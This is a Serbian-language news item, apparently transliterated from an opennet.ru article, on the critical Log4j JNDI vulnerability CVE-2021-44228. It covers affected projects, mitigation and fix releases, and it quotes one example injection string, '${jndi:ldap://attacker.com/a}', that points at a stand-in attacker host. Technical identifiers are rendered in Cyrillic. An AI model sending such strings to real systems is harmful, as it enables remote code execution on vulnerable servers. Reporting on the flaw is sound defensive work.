У Апацхе Лог4ј, популарном оквиру за организовање евидентирања у Јава апликацијама, идентификована је критична рањивост која омогућава извршавање произвољног кода када се посебно форматирана вредност у формату „{јнди:УРЛ}“ упише у дневник. Напад се може извести на Јава апликације које бележе вредности примљене из спољних извора, на пример, када се приказују проблематичне вредности у порукама о грешци.
Напомиње се да су скоро сви пројекти који користе оквире као што су Апацхе Струтс, Апацхе Солр, Апацхе Друид или Апацхе Флинк погођени проблемом, укључујући Стеам, Аппле иЦлоуд, Минецрафт клијенте и сервере. Очекује се да би рањивост могла довести до таласа масовних напада на корпоративне апликације, понављајући историју критичних рањивости у оквиру Апацхе Струтс, који, према грубој процени, користи у веб апликацијама 65% Фортуне-а. 100 компанија, укључујући покушаје скенирања мреже у потрази за рањивим системима.
Проблем је отежан чињеницом да је радни експлоат већ објављен, али исправке за стабилне гране још нису компајлиране. ЦВЕ идентификатор још увек није додељен. Исправка је укључена само у тестну грану лог4ј-2.15.0-рц1. Као решење за блокирање рањивости, препоручује се постављање параметра лог4ј2.форматМсгНоЛоокупс на труе.
Проблем је настао чињеницом да лог4ј подржава обраду специјалних маски „{}“ у линијама које излазе у дневник, у којима се могу извршити ЈНДИ (Јава Наминг анд Дирецтори Интерфаце) упити. Напад се своди на прослеђивање стринга са заменом „${јнди:лдап://аттацкер.цом/а}“, након обраде који лог4ј ће послати ЛДАП захтев за путању до Јава класе серверу аттацкер.цом . Путања коју враћа нападачев сервер (на пример, хттп://сецонд-стаге.аттацкер.цом/Екплоит.цласс) биће учитана и извршена у контексту тренутног процеса, што омогућава нападачу да изврши произвољан код на систем са правима тренутне апликације.
Додатак 1: Рањивости је додељен идентификатор ЦВЕ-2021-44228.
Додатак 2: Идентификован је начин да се заобиђе заштита додата издањем лог4ј-2.15.0-рц1. Предложено је ново ажурирање, лог4ј-2.15.0-рц2, са потпунијом заштитом од рањивости. Код наглашава промену повезану са одсуством абнормалног завршетка у случају коришћења погрешно форматираног ЈНДИ УРЛ-а.
Извор: опеннет.ру